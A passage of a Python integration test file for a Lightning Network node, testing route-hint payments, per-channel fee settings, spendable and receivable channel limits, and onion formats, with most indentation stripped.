@pytest.mark.developer("needs DEVELOPER=1 otherwise gossip takes 5 minutes!")
@pytest.mark.slow_test
def test_pay_routeboost(node_factory, bitcoind, compat):
"""Make sure we can use routeboost information. """
# l1->l2->l3--private-->l4
l1, l2 = node_factory.line_graph(2, announce_channels=True, wait_for_announce=True)
l3, l4, l5 = node_factory.line_graph(3, announce_channels=False, wait_for_announce=False)
    # This should say "could not find a route" because that's true.
error = r'Destination [a-f0-9]{66} is not reachable directly and all routehints were unusable'
with pytest.raises(RpcError, match=error):
l1.rpc.pay(l5.rpc.invoice(10**8, 'test_retry', 'test_retry')['bolt11'])
l2.rpc.connect(l3.info['id'], 'localhost', l3.port)
scidl2l3, _ = l2.fundchannel(l3, 10**6)
# Make sure l1 knows about the 2->3 channel.
bitcoind.generate_block(5)
l1.daemon.wait_for_logs([r'update for channel {}/0 now ACTIVE'
.format(scidl2l3),
r'update for channel {}/1 now ACTIVE'
.format(scidl2l3)])
# Make sure l4 knows about 2->3 channel too so it's not a dead-end.
l4.daemon.wait_for_logs([r'update for channel {}/0 now ACTIVE'
.format(scidl2l3),
r'update for channel {}/1 now ACTIVE'
.format(scidl2l3)])
# Get an l4 invoice; it should put the private channel in routeboost.
inv = l4.rpc.invoice(10**5, 'test_pay_routeboost', 'test_pay_routeboost',
exposeprivatechannels=True)
assert 'warning_capacity' not in inv
assert 'warning_offline' not in inv
assert only_one(only_one(l1.rpc.decodepay(inv['bolt11'])['routes']))
# Now we should be able to pay it.
l1.rpc.dev_pay(inv['bolt11'], use_shadow=False)
# Status should show all the gory details.
status = l1.rpc.call('paystatus', [inv['bolt11']])
assert only_one(status['pay'])['bolt11'] == inv['bolt11']
assert only_one(status['pay'])['amount_msat'] == Millisatoshi(10**5)
assert only_one(status['pay'])['destination'] == l4.info['id']
assert 'label' not in only_one(status['pay'])
assert 'routehint_modifications' not in only_one(status['pay'])
assert 'local_exclusions' not in only_one(status['pay'])
attempts = only_one(status['pay'])['attempts']
scid34 = only_one(l3.rpc.listpeers(l4.info['id'])['peers'])['channels'][0]['short_channel_id']
assert(len(attempts) == 1)
a = attempts[0]
assert(a['strategy'] == "Initial attempt")
assert('success' in a)
assert('payment_preimage' in a['success'])
# With dev-route option we can test longer routehints.
if DEVELOPER:
scid45 = only_one(l4.rpc.listpeers(l5.info['id'])['peers'])['channels'][0]['short_channel_id']
routel3l4l5 = [{'id': l3.info['id'],
'short_channel_id': scid34,
'fee_base_msat': 1000,
'fee_proportional_millionths': 10,
'cltv_expiry_delta': 6},
{'id': l4.info['id'],
'short_channel_id': scid45,
'fee_base_msat': 1000,
'fee_proportional_millionths': 10,
'cltv_expiry_delta': 6}]
inv = l5.rpc.call('invoice', {'msatoshi': 10**5,
'label': 'test_pay_routeboost2',
'description': 'test_pay_routeboost2',
'dev-routes': [routel3l4l5]})
l1.rpc.dev_pay(inv['bolt11'], use_shadow=False)
status = l1.rpc.call('paystatus', [inv['bolt11']])
pay = only_one(status['pay'])
attempts = pay['attempts']
assert(len(attempts) == 1)
assert 'failure' not in attempts[0]
assert 'success' in attempts[0]
# Finally, it should fall back to second routehint if first fails.
# (Note, this is not public because it's not 6 deep)
l3.rpc.connect(l5.info['id'], 'localhost', l5.port)
scid35, _ = l3.fundchannel(l5, 10**6)
l4.stop()
routel3l5 = [{'id': l3.info['id'],
'short_channel_id': scid35,
'fee_base_msat': 1000,
'fee_proportional_millionths': 10,
'cltv_expiry_delta': 6}]
inv = l5.rpc.call('invoice', {'msatoshi': 10**5,
'label': 'test_pay_routeboost5',
'description': 'test_pay_routeboost5',
'dev-routes': [routel3l4l5, routel3l5]})
l1.rpc.dev_pay(inv['bolt11'], label="paying test_pay_routeboost5",
use_shadow=False)
status = l1.rpc.call('paystatus', [inv['bolt11']])
assert only_one(status['pay'])['bolt11'] == inv['bolt11']
assert only_one(status['pay'])['destination'] == l5.info['id']
assert only_one(status['pay'])['label'] == "paying test_pay_routeboost5"
assert 'routehint_modifications' not in only_one(status['pay'])
assert 'local_exclusions' not in only_one(status['pay'])
attempts = only_one(status['pay'])['attempts']
    # First one fails, second one succeeds; the no-routehint attempt would come last.
assert len(attempts) == 2
assert 'success' not in attempts[0]
assert 'success' in attempts[1]
# TODO Add assertion on the routehint once we add them to the pay
# output
@pytest.mark.developer("updates are delayed without --dev-fast-gossip")
def test_setchannelfee_usage(node_factory, bitcoind):
# TEST SETUP
#
# [l1] ---> [l2] (channel funded)
# |
# o - - > [l3] (only connected)
#
# - check initial SQL values
# - check setchannelfee can be used
# - checks command's return object format
# - check custom SQL fee values
# - check values in local nodes listchannels output
# - json throws exception on negative values
# - checks if peer id can be used instead of scid
    # - checks fee_base_msat and fee_proportional_millionths in `listpeers` output
DEF_BASE = 10
DEF_BASE_MSAT = Millisatoshi(DEF_BASE)
DEF_PPM = 100
l1, l2, l3 = node_factory.get_nodes(3,
opts={'fee-base': DEF_BASE, 'fee-per-satoshi': DEF_PPM})
node_factory.join_nodes([l1, l2])
l1.rpc.connect(l3.info['id'], 'localhost', l3.port)
def channel_get_fees(scid):
return l1.db.query(
'SELECT feerate_base, feerate_ppm FROM channels '
'WHERE short_channel_id=\'{}\';'.format(scid))
# get short channel id
scid = l1.get_channel_scid(l2)
# feerates should be init with global config
db_fees = l1.db_query('SELECT feerate_base, feerate_ppm FROM channels;')
assert(db_fees[0]['feerate_base'] == DEF_BASE)
assert(db_fees[0]['feerate_ppm'] == DEF_PPM)
# this is also what listpeers should return
peers = l1.rpc.listpeers()['peers']
assert peers[0]['channels'][0]['fee_base_msat'] == DEF_BASE_MSAT
assert peers[0]['channels'][0]['fee_proportional_millionths'] == DEF_PPM
# custom setchannelfee scid <base> <ppm>
result = l1.rpc.setchannelfee(scid, 1337, 137)
# check result format
assert(result['base'] == 1337)
assert(result['ppm'] == 137)
assert(len(result['channels']) == 1)
assert(re.match('^[0-9a-f]{64}$', result['channels'][0]['channel_id']))
assert(result['channels'][0]['peer_id'] == l2.info['id'])
assert(result['channels'][0]['short_channel_id'] == scid)
# check if custom values made it into the database
db_fees = channel_get_fees(scid)
assert(db_fees[0]['feerate_base'] == 1337)
assert(db_fees[0]['feerate_ppm'] == 137)
# also check for updated values in `listpeers`
peers = l1.rpc.listpeers()['peers']
assert peers[0]['channels'][0]['fee_base_msat'] == Millisatoshi(1337)
assert peers[0]['channels'][0]['fee_proportional_millionths'] == 137
# wait for gossip and check if l1 sees new fees in listchannels
wait_for(lambda: [c['base_fee_millisatoshi'] for c in l1.rpc.listchannels(scid)['channels']] == [DEF_BASE, 1337])
wait_for(lambda: [c['fee_per_millionth'] for c in l1.rpc.listchannels(scid)['channels']] == [DEF_PPM, 137])
# also test with named and missing parameters
result = l1.rpc.setchannelfee(ppm=42, id=scid)
assert(result['base'] == DEF_BASE)
assert(result['ppm'] == 42)
assert(len(result['channels']) == 1)
assert(re.match('^[0-9a-f]{64}$', result['channels'][0]['channel_id']))
assert(result['channels'][0]['short_channel_id'] == scid)
result = l1.rpc.setchannelfee(base=42, id=scid)
assert(result['base'] == 42)
assert(result['ppm'] == DEF_PPM)
assert(len(result['channels']) == 1)
assert(re.match('^[0-9a-f]{64}$', result['channels'][0]['channel_id']))
assert(result['channels'][0]['short_channel_id'] == scid)
# check if negative fees raise error and DB keeps values
# JSONRPC2_INVALID_PARAMS := -32602
with pytest.raises(RpcError, match=r'-32602'):
l1.rpc.setchannelfee(scid, -1, -1)
# test if zero fees is possible
result = l1.rpc.setchannelfee(scid, 0, 0)
assert(result['base'] == 0)
assert(result['ppm'] == 0)
db_fees = channel_get_fees(scid)
assert(db_fees[0]['feerate_base'] == 0)
assert(db_fees[0]['feerate_ppm'] == 0)
# also check for updated values in `listpeers`
peers = l1.rpc.listpeers()['peers']
assert peers[0]['channels'][0]['fee_base_msat'] == Millisatoshi(0)
assert peers[0]['channels'][0]['fee_proportional_millionths'] == 0
# disable and check for global values to be returned
result = l1.rpc.setchannelfee(scid)
assert(result['base'] == DEF_BASE)
assert(result['ppm'] == DEF_PPM)
# check default values in DB
db_fees = channel_get_fees(scid)
assert(db_fees[0]['feerate_base'] == DEF_BASE)
assert(db_fees[0]['feerate_ppm'] == DEF_PPM)
# also check for updated values in `listpeers`
peers = l1.rpc.listpeers()['peers']
assert peers[0]['channels'][0]['fee_base_msat'] == DEF_BASE_MSAT
assert peers[0]['channels'][0]['fee_proportional_millionths'] == DEF_PPM
# check also peer id can be used
result = l1.rpc.setchannelfee(l2.info['id'], 42, 43)
assert(result['base'] == 42)
assert(result['ppm'] == 43)
assert(len(result['channels']) == 1)
assert(result['channels'][0]['peer_id'] == l2.info['id'])
assert(result['channels'][0]['short_channel_id'] == scid)
db_fees = channel_get_fees(scid)
assert(db_fees[0]['feerate_base'] == 42)
assert(db_fees[0]['feerate_ppm'] == 43)
# check if invalid scid raises proper error
with pytest.raises(RpcError, match=r'-1.*Could not find active channel of peer with that id'):
result = l1.rpc.setchannelfee(l3.info['id'], 42, 43)
with pytest.raises(RpcError, match=r'-32602.*id: should be a channel ID or short channel ID: invalid token'):
result = l1.rpc.setchannelfee('f42' + scid[3:], 42, 43)
# check if 'base' unit can be modified to satoshi
result = l1.rpc.setchannelfee(scid, '1sat')
assert(result['base'] == 1000)
db_fees = channel_get_fees(scid)
assert(db_fees[0]['feerate_base'] == 1000)
# check if 'ppm' values greater than u32_max fail
with pytest.raises(RpcError, match=r'-32602.*ppm: should be an integer: invalid token'):
l1.rpc.setchannelfee(scid, 0, 2**32)
# check if 'base' values greater than u32_max fail
with pytest.raises(RpcError, match=r'-32602.*base: exceeds u32 max: invalid token'):
l1.rpc.setchannelfee(scid, 2**32)
@pytest.mark.developer("gossip without DEVELOPER=1 is slow")
def test_setchannelfee_state(node_factory, bitcoind):
# TEST SETUP
#
# [l0] --> [l1] --> [l2]
#
    # Initiate channel [l1,l2] and try to set feerates in states other than
    # CHANNELD_NORMAL or CHANNELD_AWAITING_LOCKIN. Should raise an error.
# Use l0 to make a forward through l1/l2 for testing.
DEF_BASE = 0
DEF_PPM = 0
l0, l1, l2 = node_factory.get_nodes(3, opts={
'fee-base': DEF_BASE,
'fee-per-satoshi': DEF_PPM
})
# connection and funding
l0.rpc.connect(l1.info['id'], 'localhost', l1.port)
l0.fundchannel(l1, 1000000, wait_for_active=True)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
scid, _ = l1.fundchannel(l2, 1000000, wait_for_active=False)
    # Setting the fee in state AWAITING_LOCKIN should be possible
# assert(l1.channel_state(l2) == "CHANNELD_AWAITING_LOCKIN")
result = l1.rpc.setchannelfee(l2.info['id'], 42, 0)
assert(result['channels'][0]['peer_id'] == l2.info['id'])
# cid = result['channels'][0]['channel_id']
# test routing correct new fees once routing is established
bitcoind.generate_block(6)
sync_blockheight(bitcoind, [l0, l1, l2])
l0.wait_for_route(l2)
inv = l2.rpc.invoice(100000, 'test_setchannelfee_state', 'desc')['bolt11']
result = l0.rpc.dev_pay(inv, use_shadow=False)
assert result['status'] == 'complete'
assert result['msatoshi_sent'] == 100042
# Disconnect and unilaterally close from l2 to l1
l2.rpc.disconnect(l1.info['id'], force=True)
l1.rpc.disconnect(l2.info['id'], force=True)
result = l2.rpc.close(scid, 1)
assert result['type'] == 'unilateral'
# wait for l1 to see unilateral close via bitcoin network
while l1.channel_state(l2) == "CHANNELD_NORMAL":
bitcoind.generate_block(1)
# assert l1.channel_state(l2) == "FUNDING_SPEND_SEEN"
# Try to setchannelfee in order to raise expected error.
# To reduce false positive flakes, only test if state is not NORMAL anymore.
with pytest.raises(RpcError, match=r'-1.*'):
        l1.rpc.setchannelfee(l2.info['id'], 10, 1)
@pytest.mark.developer("gossip without DEVELOPER=1 is slow")
def test_setchannelfee_routing(node_factory, bitcoind):
# TEST SETUP
#
# [l1] <--default_fees--> [l2] <--specific_fees--> [l3]
#
# - json listchannels is able to see the new values in foreign node
# - routing calculates fees correctly
# - payment can be done using specific fees
# - channel specific fees can be disabled again
# - payment can be done using global fees
DEF_BASE = 1
DEF_PPM = 10
l1, l2, l3 = node_factory.line_graph(
3, announce_channels=True, wait_for_announce=True,
opts={'fee-base': DEF_BASE, 'fee-per-satoshi': DEF_PPM})
# get short channel id for 2->3
scid = l2.get_channel_scid(l3)
# TEST CUSTOM VALUES
l2.rpc.setchannelfee(scid, 1337, 137)
# wait for l1 to see updated channel via gossip
wait_for(lambda: [c['base_fee_millisatoshi'] for c in l1.rpc.listchannels(scid)['channels']] == [1337, DEF_BASE])
wait_for(lambda: [c['fee_per_millionth'] for c in l1.rpc.listchannels(scid)['channels']] == [137, DEF_PPM])
# test fees are applied to HTLC forwards
#
# BOLT #7:
# If l1 were to send 4,999,999 millisatoshi to l3 via l2, it needs to
# pay l2 the fee it specified in the l2->l3 `channel_update`, calculated as
# per [HTLC Fees](#htlc_fees): base + amt * pm / 10**6
#
# 1337 + 4999999 * 137 / 1000000 = 2021.999 (2021)
route = l1.rpc.getroute(l3.info['id'], 4999999, 1)["route"]
assert len(route) == 2
assert route[0]['msatoshi'] == 5002020
assert route[1]['msatoshi'] == 4999999
# In case l3 includes a routehint, we need to make sure they also know
# about the new fees, otherwise we may end up with the old feerate
wait_for(lambda: [(c['base_fee_millisatoshi'], c['fee_per_millionth'], c['active']) for c in l3.rpc.listchannels(scid)['channels']] == [(1337, 137, True), (DEF_BASE, DEF_PPM, True)])
# do and check actual payment
inv = l3.rpc.invoice(4999999, 'test_setchannelfee_1', 'desc')['bolt11']
result = l1.rpc.dev_pay(inv, use_shadow=False)
assert result['status'] == 'complete'
assert result['msatoshi_sent'] == 5002020
# TEST DISABLE and check global fee routing
l2.rpc.setchannelfee(scid)
# wait for l1 to see default values again via gossip
wait_for(lambda: [c['base_fee_millisatoshi'] for c in l1.rpc.listchannels(scid)['channels']] == [DEF_BASE, DEF_BASE])
wait_for(lambda: [c['fee_per_millionth'] for c in l1.rpc.listchannels(scid)['channels']] == [DEF_PPM, DEF_PPM])
# test if global fees are applied again (base 1 ppm 10)
# 1 + 4999999 * 10 / 1000000 = 50.999 (50)
route = l1.rpc.getroute(l3.info['id'], 4999999, 1)["route"]
assert len(route) == 2
assert route[0]['msatoshi'] == 5000049
assert route[1]['msatoshi'] == 4999999
# In case l3 includes a routehint, we need to make sure they also know
# about the new fees, otherwise we may end up with the old feerate
wait_for(lambda: [(c['base_fee_millisatoshi'], c['fee_per_millionth'], c['active']) for c in l3.rpc.listchannels(scid)['channels']] == [(DEF_BASE, DEF_PPM, True), (DEF_BASE, DEF_PPM, True)])
# do and check actual payment
inv = l3.rpc.invoice(4999999, 'test_setchannelfee_2', 'desc')['bolt11']
result = l1.rpc.dev_pay(inv, use_shadow=False)
assert result['status'] == 'complete'
assert result['msatoshi_sent'] == 5000049
@pytest.mark.developer("gossip without DEVELOPER=1 is slow")
def test_setchannelfee_zero(node_factory, bitcoind):
# TEST SETUP
#
# [l1] <--default_fees--> [l2] <--specific_fees--> [l3]
#
# - json listchannels is able to see the new values in foreign node
# - routing calculates fees correctly
# - payment can be done using zero fees
DEF_BASE = 1
DEF_PPM = 10
l1, l2, l3 = node_factory.line_graph(
3, announce_channels=True, wait_for_announce=True,
opts={'fee-base': DEF_BASE, 'fee-per-satoshi': DEF_PPM})
# get short channel id for 2->3
scid = l2.get_channel_scid(l3)
# TEST ZERO fees possible
l2.rpc.setchannelfee(scid, 0, 0)
wait_for(lambda: [c['base_fee_millisatoshi'] for c in l1.rpc.listchannels(scid)['channels']] == [0, DEF_BASE])
wait_for(lambda: [c['fee_per_millionth'] for c in l1.rpc.listchannels(scid)['channels']] == [0, DEF_PPM])
# test if zero fees are applied
route = l1.rpc.getroute(l3.info['id'], 4999999, 1)["route"]
assert len(route) == 2
assert route[0]['msatoshi'] == 4999999
assert route[1]['msatoshi'] == 4999999
# Wait for l3 to know about our low-balling, otherwise they'll add a wrong
# routehint to the invoice.
wait_for(lambda: [(c['base_fee_millisatoshi'], c['fee_per_millionth'], c['active']) for c in l3.rpc.listchannels(scid)['channels']] == [(0, 0, True), (DEF_BASE, DEF_PPM, True)])
# do and check actual payment
inv = l3.rpc.invoice(4999999, 'test_setchannelfee_3', 'desc')['bolt11']
result = l1.rpc.dev_pay(inv, use_shadow=False)
assert result['status'] == 'complete'
assert result['msatoshi_sent'] == 4999999
@pytest.mark.developer("gossip without DEVELOPER=1 is slow")
def test_setchannelfee_restart(node_factory, bitcoind):
# TEST SETUP
#
# [l1] <--default_fees--> [l2] <--specific_fees--> [l3]
#
# - l2 sets fees to custom values and restarts
# - l1 routing can be made with the custom fees
    # - l2 sets fees to UINT32_MAX (db update default) and restarts
# - l1 routing can be made to l3 and global (1 10) fees are applied
DEF_BASE = 1
DEF_PPM = 10
OPTS = {'may_reconnect': True, 'fee-base': DEF_BASE, 'fee-per-satoshi': DEF_PPM}
l1, l2, l3 = node_factory.line_graph(3, announce_channels=True, wait_for_announce=True, opts=OPTS)
    # get short channel ids
scid12 = l1.get_channel_scid(l2)
scid23 = l2.get_channel_scid(l3)
# l2 set custom fees
l2.rpc.setchannelfee(scid23, 1337, 137)
# restart l2 and reconnect
l2.restart()
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l2.rpc.connect(l3.info['id'], 'localhost', l3.port)
# Make sure l1's gossipd registered channeld activating channel.
wait_for(lambda: [c['active'] for c in l1.rpc.listchannels(scid12)['channels']] == [True, True])
# l1 wait for channel update from l2
wait_for(lambda: [(c['base_fee_millisatoshi'], c['fee_per_millionth'], c['active']) for c in l1.rpc.listchannels(scid23)['channels']] == [(1337, 137, True), (DEF_BASE, DEF_PPM, True)])
# In case l3 includes a routehint, we need to make sure they also know
# about the new fees, otherwise we may end up with the old feerate
wait_for(lambda: [(c['base_fee_millisatoshi'], c['fee_per_millionth'], c['active']) for c in l3.rpc.listchannels(scid23)['channels']] == [(1337, 137, True), (DEF_BASE, DEF_PPM, True)])
# l1 can make payment to l3 with custom fees being applied
# Note: BOLT #7 math works out to 2021 msat fees
inv = l3.rpc.invoice(4999999, 'test_setchannelfee_1', 'desc')['bolt11']
result = l1.rpc.dev_pay(inv, use_shadow=False)
assert result['status'] == 'complete'
assert result['msatoshi_sent'] == 5002020
@pytest.mark.developer("updates are delayed without --dev-fast-gossip")
def test_setchannelfee_all(node_factory, bitcoind):
# TEST SETUP
#
# [l1]----> [l2]
# |
# o-----> [l3]
DEF_BASE = 10
DEF_PPM = 100
l1, l2, l3 = node_factory.get_nodes(3, opts={'fee-base': DEF_BASE, 'fee-per-satoshi': DEF_PPM})
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.rpc.connect(l3.info['id'], 'localhost', l3.port)
l1.fundchannel(l2, 1000000)
l1.fundchannel(l3, 1000000)
# get short channel id
scid2 = l1.get_channel_scid(l2)
scid3 = l1.get_channel_scid(l3)
# now try to set all (two) channels using wildcard syntax
result = l1.rpc.setchannelfee("all", 0xDEAD, 0xBEEF)
wait_for(lambda: [c['base_fee_millisatoshi'] for c in l1.rpc.listchannels(scid2)['channels']] == [DEF_BASE, 0xDEAD])
wait_for(lambda: [c['fee_per_millionth'] for c in l1.rpc.listchannels(scid2)['channels']] == [DEF_PPM, 0xBEEF])
wait_for(lambda: [c['base_fee_millisatoshi'] for c in l1.rpc.listchannels(scid3)['channels']] == [0xDEAD, DEF_BASE])
wait_for(lambda: [c['fee_per_millionth'] for c in l1.rpc.listchannels(scid3)['channels']] == [0xBEEF, DEF_PPM])
assert len(result['channels']) == 2
assert result['base'] == 0xDEAD
assert result['ppm'] == 0xBEEF
assert result['channels'][0]['peer_id'] == l2.info['id']
assert result['channels'][0]['short_channel_id'] == scid2
assert result['channels'][1]['peer_id'] == l3.info['id']
assert result['channels'][1]['short_channel_id'] == scid3
@pytest.mark.developer("gossip without DEVELOPER=1 is slow")
def test_channel_spendable(node_factory, bitcoind):
"""Test that spendable_msat is accurate"""
sats = 10**6
l1, l2 = node_factory.line_graph(2, fundamount=sats, wait_for_announce=True,
opts={'plugin': os.path.join(os.getcwd(), 'tests/plugins/hold_invoice.py'), 'holdtime': '30'})
payment_hash = l2.rpc.invoice('any', 'inv', 'for testing')['payment_hash']
# We should be able to spend this much, and not one msat more!
amount = l1.rpc.listpeers()['peers'][0]['channels'][0]['spendable_msat']
route = l1.rpc.getroute(l2.info['id'], amount + 1, riskfactor=1, fuzzpercent=0)['route']
l1.rpc.sendpay(route, payment_hash)
# This should fail locally with "capacity exceeded"
with pytest.raises(RpcError, match=r"Capacity exceeded.*'erring_index': 0"):
l1.rpc.waitsendpay(payment_hash, TIMEOUT)
# Exact amount should succeed.
route = l1.rpc.getroute(l2.info['id'], amount, riskfactor=1, fuzzpercent=0)['route']
l1.rpc.sendpay(route, payment_hash)
# Amount should drop to 0 once HTLC is sent; we have time, thanks to
# hold_invoice.py plugin.
wait_for(lambda: len(l1.rpc.listpeers()['peers'][0]['channels'][0]['htlcs']) == 1)
assert l1.rpc.listpeers()['peers'][0]['channels'][0]['spendable_msat'] == Millisatoshi(0)
l1.rpc.waitsendpay(payment_hash, TIMEOUT)
# Make sure l2 thinks it's all over.
wait_for(lambda: len(l2.rpc.listpeers()['peers'][0]['channels'][0]['htlcs']) == 0)
# Now, reverse should work similarly.
payment_hash = l1.rpc.invoice('any', 'inv', 'for testing')['payment_hash']
amount = l2.rpc.listpeers()['peers'][0]['channels'][0]['spendable_msat']
# Turns out we won't route this, as it's over max - reserve:
route = l2.rpc.getroute(l1.info['id'], amount + 1, riskfactor=1, fuzzpercent=0)['route']
l2.rpc.sendpay(route, payment_hash)
# This should fail locally with "capacity exceeded"
with pytest.raises(RpcError, match=r"Capacity exceeded.*'erring_index': 0"):
l2.rpc.waitsendpay(payment_hash, TIMEOUT)
# Exact amount should succeed.
route = l2.rpc.getroute(l1.info['id'], amount, riskfactor=1, fuzzpercent=0)['route']
l2.rpc.sendpay(route, payment_hash)
# Amount should drop to 0 once HTLC is sent; we have time, thanks to
# hold_invoice.py plugin.
wait_for(lambda: len(l2.rpc.listpeers()['peers'][0]['channels'][0]['htlcs']) == 1)
assert l2.rpc.listpeers()['peers'][0]['channels'][0]['spendable_msat'] == Millisatoshi(0)
l2.rpc.waitsendpay(payment_hash, TIMEOUT)
@pytest.mark.developer("gossip without DEVELOPER=1 is slow")
def test_channel_receivable(node_factory, bitcoind):
"""Test that receivable_msat is accurate"""
sats = 10**6
l1, l2 = node_factory.line_graph(2, fundamount=sats, wait_for_announce=True,
opts={'plugin': os.path.join(os.getcwd(), 'tests/plugins/hold_invoice.py'), 'holdtime': '30'})
payment_hash = l2.rpc.invoice('any', 'inv', 'for testing')['payment_hash']
# We should be able to receive this much, and not one msat more!
amount = l2.rpc.listpeers()['peers'][0]['channels'][0]['receivable_msat']
route = l1.rpc.getroute(l2.info['id'], amount + 1, riskfactor=1, fuzzpercent=0)['route']
l1.rpc.sendpay(route, payment_hash)
# This should fail locally with "capacity exceeded"
with pytest.raises(RpcError, match=r"Capacity exceeded.*'erring_index': 0"):
l1.rpc.waitsendpay(payment_hash, TIMEOUT)
# Exact amount should succeed.
route = l1.rpc.getroute(l2.info['id'], amount, riskfactor=1, fuzzpercent=0)['route']
l1.rpc.sendpay(route, payment_hash)
# Amount should drop to 0 once HTLC is sent; we have time, thanks to
# hold_invoice.py plugin.
wait_for(lambda: len(l2.rpc.listpeers()['peers'][0]['channels'][0]['htlcs']) == 1)
assert l2.rpc.listpeers()['peers'][0]['channels'][0]['receivable_msat'] == Millisatoshi(0)
l1.rpc.waitsendpay(payment_hash, TIMEOUT)
# Make sure l2 thinks it's all over.
wait_for(lambda: len(l2.rpc.listpeers()['peers'][0]['channels'][0]['htlcs']) == 0)
# Now, reverse should work similarly.
payment_hash = l1.rpc.invoice('any', 'inv', 'for testing')['payment_hash']
amount = l1.rpc.listpeers()['peers'][0]['channels'][0]['receivable_msat']
# Turns out we won't route this, as it's over max - reserve:
route = l2.rpc.getroute(l1.info['id'], amount + 1, riskfactor=1, fuzzpercent=0)['route']
l2.rpc.sendpay(route, payment_hash)
# This should fail locally with "capacity exceeded"
with pytest.raises(RpcError, match=r"Capacity exceeded.*'erring_index': 0"):
l2.rpc.waitsendpay(payment_hash, TIMEOUT)
# Exact amount should succeed.
route = l2.rpc.getroute(l1.info['id'], amount, riskfactor=1, fuzzpercent=0)['route']
l2.rpc.sendpay(route, payment_hash)
# Amount should drop to 0 once HTLC is sent; we have time, thanks to
# hold_invoice.py plugin.
wait_for(lambda: len(l1.rpc.listpeers()['peers'][0]['channels'][0]['htlcs']) == 1)
assert l1.rpc.listpeers()['peers'][0]['channels'][0]['receivable_msat'] == Millisatoshi(0)
l2.rpc.waitsendpay(payment_hash, TIMEOUT)
@pytest.mark.developer("gossip without DEVELOPER=1 is slow")
def test_channel_spendable_large(node_factory, bitcoind):
"""Test that spendable_msat is accurate for large channels"""
# This is almost the max allowable spend.
sats = 4294967
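    # 4294967 sat is 4294967000 msat, just below the 2**32 - 1 msat limit for non-wumbo payments.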
l1, l2 = node_factory.line_graph(
2,
fundamount=sats,
wait_for_announce=True,
opts={
'plugin': os.path.join(os.getcwd(), 'tests/plugins/hold_invoice.py'),
'holdtime': '30'
}
)
payment_hash = l2.rpc.invoice('any', 'inv', 'for testing')['payment_hash']
# We should be able to spend this much, and not one msat more!
spendable = l1.rpc.listpeers()['peers'][0]['channels'][0]['spendable_msat']
# receivable from the other side should calculate to the exact same amount
receivable = l2.rpc.listpeers()['peers'][0]['channels'][0]['receivable_msat']
assert spendable == receivable
    # getroute or waitsendpay will fail.
with pytest.raises(RpcError):
route = l1.rpc.getroute(l2.info['id'], spendable + 1, riskfactor=1, fuzzpercent=0)['route']
l1.rpc.sendpay(route, payment_hash)
l1.rpc.waitsendpay(payment_hash, TIMEOUT)
# Exact amount should succeed.
route = l1.rpc.getroute(l2.info['id'], spendable, riskfactor=1, fuzzpercent=0)['route']
l1.rpc.sendpay(route, payment_hash)
l1.rpc.waitsendpay(payment_hash, TIMEOUT)
def test_channel_spendable_receivable_capped(node_factory, bitcoind):
"""Test that spendable_msat and receivable_msat is capped at 2^32-1"""
sats = 16777215
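    # 16777215 sat (2**24 - 1, the pre-wumbo channel size limit) is 16777215000 msat,
    # well above 2**32 - 1 msat, so the reported values must be clamped to 0xFFFFFFFF.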
l1, l2 = node_factory.line_graph(2, fundamount=sats, wait_for_announce=False)
assert l1.rpc.listpeers()['peers'][0]['channels'][0]['spendable_msat'] == Millisatoshi(0xFFFFFFFF)
assert l2.rpc.listpeers()['peers'][0]['channels'][0]['receivable_msat'] == Millisatoshi(0xFFFFFFFF)
@unittest.skipIf(True, "Test is extremely flaky")
@unittest.skipIf(not DEVELOPER and VALGRIND, "Doesn't raise exception, needs better sync")
def test_lockup_drain(node_factory, bitcoind):
"""Try to get channel into a state where opener can't afford fees on additional HTLC, so peer can't add HTLC"""
l1, l2 = node_factory.line_graph(2, opts={'may_reconnect': True})
# l1 sends all the money to l2 until even 1 msat can't get through.
total = l1.drain(l2)
# Even if feerate now increases 2x (30000), l2 should be able to send
# non-dust HTLC to l1.
l1.force_feerates(30000)
l2.pay(l1, total // 2)
# reset fees and send all back again
l1.force_feerates(15000)
l1.drain(l2)
    # But if the feerate increases just a little more, l2 should not be able to send
    # a non-dust HTLC to l1
l1.force_feerates(30002) # TODO: Why does 30001 fail? off by one in C code?
wait_for(lambda: l1.rpc.listpeers()['peers'][0]['connected'])
with pytest.raises(RpcError, match=r".*Capacity exceeded.*"):
l2.pay(l1, total // 2)
def test_error_returns_blockheight(node_factory, bitcoind):
"""Test that incorrect_or_unknown_payment_details returns block height"""
l1, l2 = node_factory.line_graph(2)
l1.rpc.sendpay([{'msatoshi': 100,
'id': l2.info['id'],
'delay': 10,
'channel': l1.get_channel_scid(l2)}],
'00' * 32)
with pytest.raises(RpcError, match=r"INCORRECT_OR_UNKNOWN_PAYMENT_DETAILS.*'erring_index': 1") as err:
l1.rpc.waitsendpay('00' * 32, TIMEOUT)
# BOLT #4:
# 1. type: PERM|15 (`incorrect_or_unknown_payment_details`)
# 2. data:
# * [`u64`:`htlc_msat`]
# * [`u32`:`height`]
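    # PERM is 0x4000, so PERM|15 == 0x400f, the '400f' prefix asserted below.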
assert (err.value.error['data']['raw_message']
== '400f{:016x}{:08x}'.format(100, bitcoind.rpc.getblockcount()))
@pytest.mark.developer('Needs dev-routes')
def test_tlv_or_legacy(node_factory, bitcoind):
l1, l2, l3 = node_factory.line_graph(3,
opts={'plugin': os.path.join(os.getcwd(), 'tests/plugins/print_htlc_onion.py')})
scid12 = l1.get_channel_scid(l2)
scid23 = l2.get_channel_scid(l3)
# We need to force l3 to provide route hint from l2 (it won't normally,
# since it sees l2 as a dead end).
inv = l3.rpc.call('invoice', {"msatoshi": 10000,
"label": "test_tlv1",
"description": "test_tlv1",
"dev-routes": [[{'id': l2.info['id'],
'short_channel_id': scid23,
'fee_base_msat': 1,
'fee_proportional_millionths': 10,
'cltv_expiry_delta': 6}]]})['bolt11']
l1.rpc.pay(inv)
# Since L1 hasn't seen broadcast, it doesn't know L2 is TLV, but invoice tells it about L3
l2.daemon.wait_for_log("Got onion.*'type': 'legacy'")
l3.daemon.wait_for_log("Got onion.*'type': 'tlv'")
# We need 5 more blocks to announce l1->l2 channel.
bitcoind.generate_block(5)
# Make sure l1 knows about l2
wait_for(lambda: 'alias' in l1.rpc.listnodes(l2.info['id'])['nodes'][0])
# Make sure l3 knows about l1->l2, so it will add route hint now.
wait_for(lambda: len(l3.rpc.listchannels(scid12)['channels']) > 0)
# Now it should send TLV to l2.
inv = l3.rpc.invoice(10000, "test_tlv2", "test_tlv2")['bolt11']
l1.rpc.pay(inv)
l2.daemon.wait_for_log("Got onion.*'type': 'tlv'")
